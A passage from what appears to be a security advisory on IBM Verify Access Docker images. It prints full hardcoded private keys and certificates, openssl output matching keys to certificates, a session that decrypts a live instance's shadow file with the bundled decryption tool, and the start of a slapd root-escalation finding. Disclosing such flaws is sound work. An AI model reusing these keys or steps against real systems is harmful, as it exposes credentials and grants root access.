F5 6D AC 64 89 28 B0 96 0B 6C FB B4 8E D9 F0 26 AD 61 35 F4 CB A4 59 F8 F6 A0 72 EB 82 CD CF 2D 85 63 CF C3 27 64 9F 52 07 05 D7 19 81 5A 57 4A 92 F5 3F 30 2D 87 BD FB 96 92 2B A0 93 E6 B8 E8 E5 90 27 70 A8 78 6F 1C 98 11 6E F9 70 60 0F 2C D8 4C 44 BF \n    Key Attributes: \u003cNo Attributes\u003e\n    -----BEGIN PRIVATE KEY-----\n    MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQC5d1UkBCpTmK74\n    01RqSKl42SInA0B8zgbLgZG+HPoniIgwzbu4lRJSFGaGjnuJH1ccWPvxuDtv5R26\n    X4EhnL9RewJiHDTq1RRnP/XqQja3uHwsKC4yUlyvhBcX+FcoTKzq4y724ZZs2GIM\n    +Q4d4OsXAomQz3TeEWT9tyr7gCgDJ8W3WvpEUE6mpvm0OPujFivAM9Ws6bY7zcZr\n    qjU4Nct//gq9qlZuKMWan68vE+yMqJAkCCLh6YG8EA+TU/TQP4cCeCIiUBBC6A1R\n    CMbCA9t7AgWTlJPxuPTdgTETLRXDlMJWhWxuTGWtkXrrSXaWIwBTk4XVfeK2xkYs\n    RPNFmBZ1AgMBAAECggEAIt1sA/lEe7KYMe6IT/KY6T7oTK0v0kZowJj67OJFpGjm\n    MUZ7o5diekubenAOiRh7J7kSo74ebkqD7CVIASmWTZryN79Vs0+bJk2/zOnln2Pu\n    894Z0RvqkJQkQz1MJSdE2mMa0Q5XWN7Uj9vB65v8lbbEZZSaQ6TBd3CXg+/zlaPy\n    MvRgK5XvrzCKWD9PtWpIb4nRssJhVDAgfPQf5tlQ05QhKagakxENVB6wmcvOiU2l\n    zYZDTUGFVfgd1OxH7JICaTfBlhncd2OYaHxr+sXrPGuI+Ckz/U5q6UU+/b5EYEPr\n    7BSlmptg6CCFLlJ/Mz3qzcm2Wd9/KWEEbwr7fRLcAQKBgQDIoEC54Fsdj07SHwaM\n    iWC72WysdBedH5DUM39cRiorYz/E5rFIKWz8c4Fz4sx0IkTqM2JvS1frtvPgMTTV\n    PvowBcLrLIIBj3ZktheAijCtB7g0FR8EBJpJvY3nPYYA08akeJ2wIrV/AdXiMGR+\n    dJXnJRmoVI6tdk/Y9xRfUuahqQKBgQDsp+v5PkMWYyRsja6cjN4K9bExRbPCMyXo\n    o3VisQXQYnVdKJE86g+PMiwY4KJksZ3ZPYduB4Hn+9qcKWRXkg/VbInE9+TxwBOT\n    E4cf1bUibtNZEF4JeV7/FE+K76RgxROufXpRlrTqlmzblIBIeA14sGCC/3unb6tV\n    mfCGe18l7QKBgQCs0g6vj2otrnMRYZR8nyJq7sJEU8S7nqNdh/bf/7j3owkdjjOM\n    m9K8LKuIrge8yoBe1mCmylo0PGcb6oc+Yn+VuoDLoI1k1rX/zzOzkFaZ1pqAkuki\n    xuw5NUX1ufOi5sqohxYe0edSPryFmXYX0EoI0NanQB+foNjrZvtvmbP98QKBgAHG\n    0PKyEPbeD6vw9FqghBo49feUumC+2Y4BjCQNiCmkU5U7dLusVimRCtu09AMlgjXb\n    TGT7EXKYZW++r84ofo3vnqkn40QdWQhFoUIP7KgxhMyqXspbaucnU+GLIwTG9frd\n    Xkm2g+0u6+pKFxx0KkW5rT/OgzMil3qxCSk5S+GRAoGAVzyS/rD6YInD7/vWUqwm\n    ttgKBm1d/uL2fMzx0KCnuKd5gJwfLIx9wDR4862VyWxOof8quqAWAthSGgg99Bjj\n    dujkG+fMEu+pYaxTmte0HSC4I+QTkQrOup4wtwVFz2t+0yPlmneQXmJ+K5Wu9ClR\n    uxhPVbNJYbPOs02by37UXn8=\n    -----END PRIVATE KEY-----\n    Bag Attributes\n        friendlyName: encKey\n        localKeyID: 03 82 01 01 00 BB 0F 22 30 06 39 08 3E 65 E7 67 A2 F7 A0 1A 96 6F A6 75 57 3E AF B0 64 7D 83 07 47 6C A3 CE 91 7D 11 94 B5 E9 F7 79 74 F0 22 AB 50 C7 49 66 5E 64 0C 63 07 B7 43 F2 35 52 E4 2C CC C0 1F B4 ED 2F 18 CB D3 A0 3C 3F 6D 07 88 AD B6 FE 52 2B EA 10 0C 9C 0A F4 04 21 20 95 E9 A7 39 E9 6F F1 83 11 5E B7 C5 D5 41 F8 D0 4B BC A2 D5 C6 1B E0 77 F4 91 F2 1B 23 25 17 42 29 19 3E CE 4E 39 12 E5 29 30 69 6A FE 47 BA E6 D8 D5 5E 3C 23 C6 B5 40 49 E5 64 7E 69 CC 43 E0 15 AE F5 DC D9 8C 27 6F 2E 09 25 85 C3 F8 95 44 12 42 6F C5 D1 E0 41 B2 F0 00 90 2C EA 36 05 1D DF F3 A3 B6 4F 42 E6 6D F2 33 BD 9F AE 3F 18 4E 79 08 35 BC 28 15 AC 23 0E B5 28 23 C2 08 3D 6A 39 5D 37 FA 60 13 EF 19 C3 7A 9C DB F0 19 0C AC 0D D0 51 B1 1B AE 22 A4 B7 92 3B FF 61 A3 0F 1C 6E 52 97 FE 2D 65 CB 13 \n    Key Attributes: \u003cNo Attributes\u003e\n    -----BEGIN PRIVATE KEY-----\n    MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQDsJ4YkXiuJVyuD\n    N2Ibykd86ieUfIqlRJ4t0Z40CXkfcUoSYfGfEUl0vGa/hRV6dBgr0cvsP1Uuh8lM\n    x1k7AF2LZB/3Hf42MiN4b1BShCkU//UDjw3IJDblpDxAs6+wNHLjZ3Tmu4j8WPH6\n    szaEMmLKdAOVX3j4pElcoTwsozR+F+1XBcp9G+nhIymvTaskWy8Qi2EHl+M2qbrw\n    G9Iissr1wX3KnI5hxvHAtEflwFu1qIcQFdEo/nG6+45TzhuIUTep1jcqDKTFsuzM\n    DrlEPELGqHVhkYrUaCYUtiEOjZXcE6Hufy10nEjo3nARyKlIom3A9Gi8qscq9Xh3\n    R5JZZbEtAgMBAAECggEABB9RCrysBAAZuFSREk47s+NE5JGSN3klHESHzinuZphv\n    9piID0BX0/Ar6uo4aO+GXrj9fqHZi2ikR/12yW0NpjYhcMsr1geMTNkJXPex+wwJ\n    eQWaoEXeBk3bbGbfMzqrxUh/QgyJqpu48wZ7ROSIqF5DMYVPElkkSAHWmdvgUnQi\n    T5m+F+eq5dGYx82V/COXKzOKUd714o7uL6bPqnFbZlQLGbDnUruFLLNsktrVhMCH\n    f2n7vj2irRyehFB9iJWoQYzZRYnt7ZZwaiC5tM1FH08Ba9KWhKioV0euO8t2ojkt\n    VW3EKTx5qrxnKvchlgDzb9neb/p9PtFUy/AuB/3n6QKBgQDzv99rQUVVLsaTFK8A\n    UWzXfEB+su0vxK5Q8hpgF9EdOGLZQtTpl8/xIj5Np7OqVclQA7usx6t9mcJwjkdH\n    blUubDs8MOcvbxfjOos3LdZ4egOfiac7N4nMkjh1XUvUt0bvkNO+GtgDgsS16EiE\n    X9fsafsbkQYqsNd1qag4u5M9xQKBgQD4Be5dLZ0A62qQlaQA5Vl8bp8woL843qKC\n    PYGIEf5/sQX3oYRhM2En6RI4nMt6htPn7WB0T7vCCi+XEACnruAUJFEyZARpeGHG\n    5jx3p4p3l/QUxCgdzXceEJTjabesOOZSuPazjaj1RWoAU7fRTwnG+0msq15zlkqG\n    UjVnqsoESQKBgBheXl/CrsPNYVzi/HvzqAYDDg+co8nax/KfwbNJrkZVlMxTuiWA\n    X/GjkscAtR2aZf3x4ZlsfOCZtq66CrZBeZKij2l9Gh/L4398It7pXj+9Mw+IG4f4\n    DXa+R5a0NRiXGihpOkIPPPlc4X2uM1HIozWngstGvG8YLvI8e+zwE9BhAoGAf649\n    +YXjz3dh0rDWTwfCu4YPOW9nQZWLP1T+e9gXlhDBq6tghNF4cJ1RngdJ0Pfb2wee\n    ogHx/IBV44R/cdNa08OmcTR/+PPaEhSwiECdzddR9ebNaBo/+iA7JZ9kyKo6F9fU\n    WLbShgGIAkcW2A/CTsdKNDO8WfDCyMdFaurHONECgYA0e/5TN/+AGLktUd7VIlOC\n    5FCHkAGl4iHJn/3v5r8yfh55Otf+K9vIUrEGW9XEouIofLMapbKqxiTD7YCbrbsy\n    NyoRMUtmBWnh7yrWkl/gvLIRsAw1R248Q1uxLb0JytRyf/8vW0YOK1grDxnijULH\n    arClGP/McDNH4FD3S9dgJQ==\n    -----END PRIVATE KEY-----\n\n\nAnd the corresponding certificates:\n\n    Bag Attributes\n        friendlyName: ca\n        localKeyID: 03 82 01 01 00 6F 9B 85 F2 CA 2A DC A3 2E BA F7 D9 36 40 D4 D4 4D 31 A4 AC 23 2E 6E F0 9F 04 90 D7 F5 EC D1 31 7C 39 DB 80 20 7D A2 6C F5 30 F1 B6 C0 8C 1D 9F 32 87 A0 84 FE 22 AC 8F 0E D8 36 03 6D 69 29 E2 57 0C B3 9B 05 C4 E0 1E 81 51 EB 33 49 C3 D3 E1 F2 4E C0 CA 0C 5A A8 F9 5D 54 1F CF BE C0 9A 70 C4 6F 94 65 70 14 9F 1B 74 29 6E EB 00 1F 55 9B FE A1 00 CC FB DC CD 20 35 64 DF D6 A5 A7 F4 FB 76 DB D5 AA 6D 67 08 B1 F8 0B 71 37 AF A2 90 C3 AA 57 38 5B 48 E7 AE 35 6C 0C 8A E3 99 7D 90 94 B0 F8 1E 13 17 F9 A9 2F 5F 87 35 8B F5 6D AC 64 89 28 B0 96 0B 6C FB B4 8E D9 F0 26 AD 61 35 F4 CB A4 59 F8 F6 A0 72 EB 82 CD CF 2D 85 63 CF C3 27 64 9F 52 07 05 D7 19 81 5A 57 4A 92 F5 3F 30 2D 87 BD FB 96 92 2B A0 93 E6 B8 E8 E5 90 27 70 A8 78 6F 1C 98 11 6E F9 70 60 0F 2C D8 4C 44 BF \n    subject=C = us, O = ibm, OU = isam, CN = ca\n    issuer=C = us, O = ibm, OU = isam, CN = ca\n    -----BEGIN CERTIFICATE-----\n    MIIDNDCCAhygAwIBAgIINKDsXZO6zrowDQYJKoZIhvcNAQELBQAwNzELMAkGA1UE\n    BhMCdXMxDDAKBgNVBAoTA2libTENMAsGA1UECxMEaXNhbTELMAkGA1UEAxMCY2Ew\n    IBcNMTkwMzIxMDQ1NzAzWhgPMjEwMTA1MTEwNDU3MDNaMDcxCzAJBgNVBAYTAnVz\n    MQwwCgYDVQQKEwNpYm0xDTALBgNVBAsTBGlzYW0xCzAJBgNVBAMTAmNhMIIBIjAN\n    BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuXdVJAQqU5iu+NNUakipeNkiJwNA\n    fM4Gy4GRvhz6J4iIMM27uJUSUhRmho57iR9XHFj78bg7b+Udul+BIZy/UXsCYhw0\n    6tUUZz/16kI2t7h8LCguMlJcr4QXF/hXKEys6uMu9uGWbNhiDPkOHeDrFwKJkM90\n    3hFk/bcq+4AoAyfFt1r6RFBOpqb5tDj7oxYrwDPVrOm2O83Ga6o1ODXLf/4KvapW\n    bijFmp+vLxPsjKiQJAgi4emBvBAPk1P00D+HAngiIlAQQugNUQjGwgPbewIFk5ST\n    8bj03YExEy0Vw5TCVoVsbkxlrZF660l2liMAU5OF1X3itsZGLETzRZgWdQIDAQAB\n    o0IwQDAfBgNVHSMEGDAWgBRXaoj3HRsUC6I+wha3FcN9ng+jDDAdBgNVHQ4EFgQU\n    V2qI9x0bFAuiPsIWtxXDfZ4PowwwDQYJKoZIhvcNAQELBQADggEBAG+bhfLKKtyj\n    Lrr32TZA1NRNMaSsIy5u8J8EkNf17NExfDnbgCB9omz1MPG2wIwdnzKHoIT+IqyP\n    Dtg2A21pKeJXDLObBcTgHoFR6zNJw9Ph8k7AygxaqPldVB/PvsCacMRvlGVwFJ8b\n    dClu6wAfVZv+oQDM+9zNIDVk39alp/T7dtvVqm1nCLH4C3E3r6KQw6pXOFtI5641\n    bAyK45l9kJSw+B4TF/mpL1+HNYv1baxkiSiwlgts+7SO2fAmrWE19MukWfj2oHLr\n    gs3PLYVjz8MnZJ9SBwXXGYFaV0qS9T8wLYe9+5aSK6CT5rjo5ZAncKh4bxyYEW75\n    cGAPLNhMRL8=\n    -----END CERTIFICATE-----\n    Bag Attributes\n        friendlyName: encKey\n        localKeyID: 03 82 01 01 00 BB 0F 22 30 06 39 08 3E 65 E7 67 A2 F7 A0 1A 96 6F A6 75 57 3E AF B0 64 7D 83 07 47 6C A3 CE 91 7D 11 94 B5 E9 F7 79 74 F0 22 AB 50 C7 49 66 5E 64 0C 63 07 B7 43 F2 35 52 E4 2C CC C0 1F B4 ED 2F 18 CB D3 A0 3C 3F 6D 07 88 AD B6 FE 52 2B EA 10 0C 9C 0A F4 04 21 20 95 E9 A7 39 E9 6F F1 83 11 5E B7 C5 D5 41 F8 D0 4B BC A2 D5 C6 1B E0 77 F4 91 F2 1B 23 25 17 42 29 19 3E CE 4E 39 12 E5 29 30 69 6A FE 47 BA E6 D8 D5 5E 3C 23 C6 B5 40 49 E5 64 7E 69 CC 43 E0 15 AE F5 DC D9 8C 27 6F 2E 09 25 85 C3 F8 95 44 12 42 6F C5 D1 E0 41 B2 F0 00 90 2C EA 36 05 1D DF F3 A3 B6 4F 42 E6 6D F2 33 BD 9F AE 3F 18 4E 79 08 35 BC 28 15 AC 23 0E B5 28 23 C2 08 3D 6A 39 5D 37 FA 60 13 EF 19 C3 7A 9C DB F0 19 0C AC 0D D0 51 B1 1B AE 22 A4 B7 92 3B FF 61 A3 0F 1C 6E 52 97 FE 2D 65 CB 13 \n    subject=C = US, O = IBM, OU = GSKIT, CN = encKey\n    issuer=C = US, O = IBM, OU = GSKIT, CN = encKey\n    -----BEGIN CERTIFICATE-----\n    MIIEJjCCAw6gAwIBAgIIEuizp4Aw/w8wDQYJKoZIhvcNAQEFBQAwPDELMAkGA1UE\n    BhMCVVMxDDAKBgNVBAoTA0lCTTEOMAwGA1UECxMFR1NLSVQxDzANBgNVBAMTBmVu\n    Y0tleTAeFw0xOTAzMjEwNDU2NTlaFw0yOTAzMTkwNDU2NTlaMDwxCzAJBgNVBAYT\n    AlVTMQwwCgYDVQQKEwNJQk0xDjAMBgNVBAsTBUdTS0lUMQ8wDQYDVQQDEwZlbmNL\n    ZXkwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDsJ4YkXiuJVyuDN2Ib\n    ykd86ieUfIqlRJ4t0Z40CXkfcUoSYfGfEUl0vGa/hRV6dBgr0cvsP1Uuh8lMx1k7\n    AF2LZB/3Hf42MiN4b1BShCkU//UDjw3IJDblpDxAs6+wNHLjZ3Tmu4j8WPH6szaE\n    MmLKdAOVX3j4pElcoTwsozR+F+1XBcp9G+nhIymvTaskWy8Qi2EHl+M2qbrwG9Ii\n    ssr1wX3KnI5hxvHAtEflwFu1qIcQFdEo/nG6+45TzhuIUTep1jcqDKTFsuzMDrlE\n    PELGqHVhkYrUaCYUtiEOjZXcE6Hufy10nEjo3nARyKlIom3A9Gi8qscq9Xh3R5JZ\n    ZbEtAgMBAAGjggEqMIIBJjCCASIGHCsGAQSD3OuTf4Pc65N/g9zrk3+r7CeDsWQC\n    pwkEggEARE7WVCtMEiBaqLgkERWOycU2QormaqloW2kdYi0iZT7NV/3tw0DNbcGK\n    pWdWfqtM4BM2x7Zq1ilGkK3NtGDnvRTBvrCFt0j/fU80/B9yBoELS0OWqKDkLiZi\n    enYORA427Y4JNYiRWngQCBPboqqp1oOB03dxujVH85W/3AniYol4fZBiUdYMfhWi\n    0sKxy5El/XDpYsA8w6ZQ0jz3/uQkNzY96A6QdO/4wB9P4YpKrl3XTKYGMtwoSW4b\n    QbXu2DOWvPZHxkXLizkeEk9/j+DC27nA7/ZIBNRV4pqOg2lo+7Po9XwwNyE2+1o2\n    4/2lwxPxDvGFYP05F78XHPEal8LgPTANBgkqhkiG9w0BAQUFAAOCAQEAuw8iMAY5\n    CD5l52ei96Aalm+mdVc+r7BkfYMHR2yjzpF9EZS16fd5dPAiq1DHSWZeZAxjB7dD\n    8jVS5CzMwB+07S8Yy9OgPD9tB4ittv5SK+oQDJwK9AQhIJXppznpb/GDEV63xdVB\n    +NBLvKLVxhvgd/SR8hsjJRdCKRk+zk45EuUpMGlq/ke65tjVXjwjxrVASeVkfmnM\n    Q+AVrvXc2Ywnby4JJYXD+JVEEkJvxdHgQbLwAJAs6jYFHd/zo7ZPQuZt8jO9n64/\n    GE55CDW8KBWsIw61KCPCCD1qOV03+mAT7xnDepzb8BkMrA3QUbEbriKkt5I7/2Gj\n    DxxuUpf+LWXLEw==\n    -----END CERTIFICATE-----\n\n\nAfter the analysis of the certificates and the private keys, we were able to extract a CA private key and a private encryption/decryption key:\n\n    kali-docker# openssl x509 -in ca.pem -text -noout -modulus\n    Certificate:\n        Data:\n            Version: 3 (0x2)\n            Serial Number: 3792290772900564666 (0x34a0ec5d93baceba)\n            Signature Algorithm: sha256WithRSAEncryption\n            Issuer: C=us, O=ibm, OU=isam, CN=ca\n            Validity\n                Not Before: Mar 21 04:57:03 2019 GMT\n                Not After : May 11 04:57:03 2101 GMT\n            Subject: C=us, O=ibm, OU=isam, CN=ca\n            Subject Public Key Info:\n                Public Key Algorithm: rsaEncryption\n                    Public-Key: (2048 bit)\n                    Modulus:\n                        00:b9:77:55:24:04:2a:53:98:ae:f8:d3:54:6a:48:\n                        a9:78:d9:22:27:03:40:7c:ce:06:cb:81:91:be:1c:\n                        fa:27:88:88:30:cd:bb:b8:95:12:52:14:66:86:8e:\n                        7b:89:1f:57:1c:58:fb:f1:b8:3b:6f:e5:1d:ba:5f:\n                        81:21:9c:bf:51:7b:02:62:1c:34:ea:d5:14:67:3f:\n                        f5:ea:42:36:b7:b8:7c:2c:28:2e:32:52:5c:af:84:\n                        17:17:f8:57:28:4c:ac:ea:e3:2e:f6:e1:96:6c:d8:\n                        62:0c:f9:0e:1d:e0:eb:17:02:89:90:cf:74:de:11:\n                        64:fd:b7:2a:fb:80:28:03:27:c5:b7:5a:fa:44:50:\n                        4e:a6:a6:f9:b4:38:fb:a3:16:2b:c0:33:d5:ac:e9:\n                        b6:3b:cd:c6:6b:aa:35:38:35:cb:7f:fe:0a:bd:aa:\n                        56:6e:28:c5:9a:9f:af:2f:13:ec:8c:a8:90:24:08:\n                        22:e1:e9:81:bc:10:0f:93:53:f4:d0:3f:87:02:78:\n                        22:22:50:10:42:e8:0d:51:08:c6:c2:03:db:7b:02:\n                        05:93:94:93:f1:b8:f4:dd:81:31:13:2d:15:c3:94:\n                        c2:56:85:6c:6e:4c:65:ad:91:7a:eb:49:76:96:23:\n                        00:53:93:85:d5:7d:e2:b6:c6:46:2c:44:f3:45:98:\n                        16:75\n                    Exponent: 65537 (0x10001)\n            X509v3 extensions:\n                X509v3 Authority Key Identifier: \n                    57:6A:88:F7:1D:1B:14:0B:A2:3E:C2:16:B7:15:C3:7D:9E:0F:A3:0C\n                X509v3 Subject Key Identifier: \n                    57:6A:88:F7:1D:1B:14:0B:A2:3E:C2:16:B7:15:C3:7D:9E:0F:A3:0C\n        Signature Algorithm: sha256WithRSAEncryption\n        Signature Value:\n            6f:9b:85:f2:ca:2a:dc:a3:2e:ba:f7:d9:36:40:d4:d4:4d:31:\n            a4:ac:23:2e:6e:f0:9f:04:90:d7:f5:ec:d1:31:7c:39:db:80:\n            20:7d:a2:6c:f5:30:f1:b6:c0:8c:1d:9f:32:87:a0:84:fe:22:\n            ac:8f:0e:d8:36:03:6d:69:29:e2:57:0c:b3:9b:05:c4:e0:1e:\n            81:51:eb:33:49:c3:d3:e1:f2:4e:c0:ca:0c:5a:a8:f9:5d:54:\n            1f:cf:be:c0:9a:70:c4:6f:94:65:70:14:9f:1b:74:29:6e:eb:\n            00:1f:55:9b:fe:a1:00:cc:fb:dc:cd:20:35:64:df:d6:a5:a7:\n            f4:fb:76:db:d5:aa:6d:67:08:b1:f8:0b:71:37:af:a2:90:c3:\n            aa:57:38:5b:48:e7:ae:35:6c:0c:8a:e3:99:7d:90:94:b0:f8:\n            1e:13:17:f9:a9:2f:5f:87:35:8b:f5:6d:ac:64:89:28:b0:96:\n            0b:6c:fb:b4:8e:d9:f0:26:ad:61:35:f4:cb:a4:59:f8:f6:a0:\n            72:eb:82:cd:cf:2d:85:63:cf:c3:27:64:9f:52:07:05:d7:19:\n            81:5a:57:4a:92:f5:3f:30:2d:87:bd:fb:96:92:2b:a0:93:e6:\n            b8:e8:e5:90:27:70:a8:78:6f:1c:98:11:6e:f9:70:60:0f:2c:\n            d8:4c:44:bf\n    Modulus=B9775524042A5398AEF8D3546A48A978D9222703407CCE06CB8191BE1CFA27888830CDBBB89512521466868E7B891F571C58FBF1B83B6FE51DBA5F81219CBF517B02621C34EAD514673FF5EA4236B7B87C2C282E32525CAF841717F857284CACEAE32EF6E1966CD8620CF90E1DE0EB17028990CF74DE1164FDB72AFB80280327C5B75AFA44504EA6A6F9B438FBA3162BC033D5ACE9B63BCDC66BAA353835CB7FFE0ABDAA566E28C59A9FAF2F13EC8CA890240822E1E981BC100F9353F4D03F8702782222501042E80D5108C6C203DB7B0205939493F1B8F4DD8131132D15C394C256856C6E4C65AD917AEB4976962300539385D57DE2B6C6462C44F345981675\n    kali-docker# openssl rsa -in ca.key -modulus -noout       \n    Modulus=B9775524042A5398AEF8D3546A48A978D9222703407CCE06CB8191BE1CFA27888830CDBBB89512521466868E7B891F571C58FBF1B83B6FE51DBA5F81219CBF517B02621C34EAD514673FF5EA4236B7B87C2C282E32525CAF841717F857284CACEAE32EF6E1966CD8620CF90E1DE0EB17028990CF74DE1164FDB72AFB80280327C5B75AFA44504EA6A6F9B438FBA3162BC033D5ACE9B63BCDC66BAA353835CB7FFE0ABDAA566E28C59A9FAF2F13EC8CA890240822E1E981BC100F9353F4D03F8702782222501042E80D5108C6C203DB7B0205939493F1B8F4DD8131132D15C394C256856C6E4C65AD917AEB4976962300539385D57DE2B6C6462C44F345981675\n    \n    kali-docker# openssl x509 -in encKey.pem -text -noout -modulus\n    Certificate:\n        Data:\n            Version: 3 (0x2)\n            Serial Number: 1362536419271180047 (0x12e8b3a78030ff0f)\n            Signature Algorithm: sha1WithRSAEncryption\n            Issuer: C=US, O=IBM, OU=GSKIT, CN=encKey\n            Validity\n                Not Before: Mar 21 04:56:59 2019 GMT\n                Not After : Mar 19 04:56:59 2029 GMT\n            Subject: C=US, O=IBM, OU=GSKIT, CN=encKey\n            Subject Public Key Info:\n                Public Key Algorithm: rsaEncryption\n                    Public-Key: (2048 bit)\n                    Modulus:\n                        00:ec:27:86:24:5e:2b:89:57:2b:83:37:62:1b:ca:\n                        47:7c:ea:27:94:7c:8a:a5:44:9e:2d:d1:9e:34:09:\n                        79:1f:71:4a:12:61:f1:9f:11:49:74:bc:66:bf:85:\n                        15:7a:74:18:2b:d1:cb:ec:3f:55:2e:87:c9:4c:c7:\n                        59:3b:00:5d:8b:64:1f:f7:1d:fe:36:32:23:78:6f:\n                        50:52:84:29:14:ff:f5:03:8f:0d:c8:24:36:e5:a4:\n                        3c:40:b3:af:b0:34:72:e3:67:74:e6:bb:88:fc:58:\n                        f1:fa:b3:36:84:32:62:ca:74:03:95:5f:78:f8:a4:\n                        49:5c:a1:3c:2c:a3:34:7e:17:ed:57:05:ca:7d:1b:\n                        e9:e1:23:29:af:4d:ab:24:5b:2f:10:8b:61:07:97:\n                        e3:36:a9:ba:f0:1b:d2:22:b2:ca:f5:c1:7d:ca:9c:\n                        8e:61:c6:f1:c0:b4:47:e5:c0:5b:b5:a8:87:10:15:\n                        d1:28:fe:71:ba:fb:8e:53:ce:1b:88:51:37:a9:d6:\n                        37:2a:0c:a4:c5:b2:ec:cc:0e:b9:44:3c:42:c6:a8:\n                        75:61:91:8a:d4:68:26:14:b6:21:0e:8d:95:dc:13:\n                        a1:ee:7f:2d:74:9c:48:e8:de:70:11:c8:a9:48:a2:\n                        6d:c0:f4:68:bc:aa:c7:2a:f5:78:77:47:92:59:65:\n                        b1:2d\n                    Exponent: 65537 (0x10001)\n            X509v3 extensions:\n                1.3.6.1.4.999999999.999999999.999999999.718375.55524.2.5001: \n                    DN.T+L. Z..$.....6B..j.h[i.b-\"e\u003e.W...@.m...gV~.L..6..j.)F....`........H.}O4..r...KC.....\u0026bzv.D.6...5..Zx...........wq.5G......b.x}.bQ..~.......%.p.b.\u003c..P.\u003c...$76=...t....O..J.].L..2.(In.A...3...G.E..9..O.........H..U....ih....|07!6.Z6.........`.9.........=\n        Signature Algorithm: sha1WithRSAEncryption\n        Signature Value:\n            bb:0f:22:30:06:39:08:3e:65:e7:67:a2:f7:a0:1a:96:6f:a6:\n            75:57:3e:af:b0:64:7d:83:07:47:6c:a3:ce:91:7d:11:94:b5:\n            e9:f7:79:74:f0:22:ab:50:c7:49:66:5e:64:0c:63:07:b7:43:\n            f2:35:52:e4:2c:cc:c0:1f:b4:ed:2f:18:cb:d3:a0:3c:3f:6d:\n            07:88:ad:b6:fe:52:2b:ea:10:0c:9c:0a:f4:04:21:20:95:e9:\n            a7:39:e9:6f:f1:83:11:5e:b7:c5:d5:41:f8:d0:4b:bc:a2:d5:\n            c6:1b:e0:77:f4:91:f2:1b:23:25:17:42:29:19:3e:ce:4e:39:\n            12:e5:29:30:69:6a:fe:47:ba:e6:d8:d5:5e:3c:23:c6:b5:40:\n            49:e5:64:7e:69:cc:43:e0:15:ae:f5:dc:d9:8c:27:6f:2e:09:\n            25:85:c3:f8:95:44:12:42:6f:c5:d1:e0:41:b2:f0:00:90:2c:\n            ea:36:05:1d:df:f3:a3:b6:4f:42:e6:6d:f2:33:bd:9f:ae:3f:\n            18:4e:79:08:35:bc:28:15:ac:23:0e:b5:28:23:c2:08:3d:6a:\n            39:5d:37:fa:60:13:ef:19:c3:7a:9c:db:f0:19:0c:ac:0d:d0:\n            51:b1:1b:ae:22:a4:b7:92:3b:ff:61:a3:0f:1c:6e:52:97:fe:\n            2d:65:cb:13\n    Modulus=EC2786245E2B89572B8337621BCA477CEA27947C8AA5449E2DD19E3409791F714A1261F19F114974BC66BF85157A74182BD1CBEC3F552E87C94CC7593B005D8B641FF71DFE363223786F5052842914FFF5038F0DC82436E5A43C40B3AFB03472E36774E6BB88FC58F1FAB336843262CA7403955F78F8A4495CA13C2CA3347E17ED5705CA7D1BE9E12329AF4DAB245B2F108B610797E336A9BAF01BD222B2CAF5C17DCA9C8E61C6F1C0B447E5C05BB5A8871015D128FE71BAFB8E53CE1B885137A9D6372A0CA4C5B2ECCC0EB9443C42C6A87561918AD4682614B6210E8D95DC13A1EE7F2D749C48E8DE7011C8A948A26DC0F468BCAAC72AF5787747925965B12D\n    kali-docker# openssl rsa -in encKey.key -modulus -noout       \n    \n    Modulus=EC2786245E2B89572B8337621BCA477CEA27947C8AA5449E2DD19E3409791F714A1261F19F114974BC66BF85157A74182BD1CBEC3F552E87C94CC7593B005D8B641FF71DFE363223786F5052842914FFF5038F0DC82436E5A43C40B3AFB03472E36774E6BB88FC58F1FAB336843262CA7403955F78F8A4495CA13C2CA3347E17ED5705CA7D1BE9E12329AF4DAB245B2F108B610797E336A9BAF01BD222B2CAF5C17DCA9C8E61C6F1C0B447E5C05BB5A8871015D128FE71BAFB8E53CE1B885137A9D6372A0CA4C5B2ECCC0EB9443C42C6A87561918AD4682614B6210E8D95DC13A1EE7F2D749C48E8DE7011C8A948A26DC0F468BCAAC72AF5787747925965B12D\n    kali-docker# \n\nIt is also possible to decrypt the `shadow.enc` file of a live instance using the hardcoded `device_key.kdb`:\n\n    kali-docker# file shadow.enc                                                                                             \n    shadow.enc: data\n    kali-docker# LD_LIBRARY_PATH=/home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/lib64:/home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/local/ibm/gsk8_64/lib64  /home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/sbin/isva_decrypt shadow.enc\n    kali-docker# cat shadow.enc \n    root:!!$6$[REDACTED]:19255:0:99999:7:::\n    bin:*:18367:0:99999:7:::\n    daemon:*:18367:0:99999:7:::\n    adm:*:18367:0:99999:7:::\n    lp:*:18367:0:99999:7:::\n    sync:*:18367:0:99999:7:::\n    shutdown:*:18367:0:99999:7:::\n    halt:*:18367:0:99999:7:::\n    mail:*:18367:0:99999:7:::\n    operator:*:18367:0:99999:7:::\n    games:*:18367:0:99999:7:::\n    ftp:*:18367:0:99999:7:::\n    nobody:*:18367:0:99999:7:::\n    dbus:!!:19115::::::\n    systemd-coredump:!!:19115::::::\n    systemd-resolve:!!:19115::::::\n    tss:!!:19115::::::\n    postgres:!!:19151::::::\n    ldap:!!:19151::::::\n    admin:$6$[REDACTED]:19255:0:99999:7:::\n    www-data:*:14251:0:99999:7:::\n    ivmgr:!!:19151:0:99999:7:::\n    cluster::19151:0:99999:7:::\n    pgresql:!!:19151:0:99999:7:::\n    nfast:!!:19151:0:99999:7:::\n    tivoli:!!:19151:0:99999:7:::\n    isam:!!:19151:1:90:7:::\n\n\nAn attacker can easily decrypt the encrypted files inside the snapshot files. These snapshots contain an `openldap.zip` file containing the OpenLDAP configuration, keytabs, passwords, SSL certificates and private keys. \n\nThe encryption mechanism, based on hardcoded keys, is ineffective and provides a false assumption of security. \n\n\n\n## Details - Local Privilege Escalation using OpenLDAP\n\nIt was observed that the official IBM Docker image ibmcom/verify-access contains a Local Privilege Escalation vulnerability. \n\nThe binary `slapd`, used to run OpenLDAP has incorrect permissions, allowing any user to run `slapd` as root. An attacker can run `slapd` as root and specify a malicious configuration file that will run code as root. \n\nUsing a static analysis, the file system has 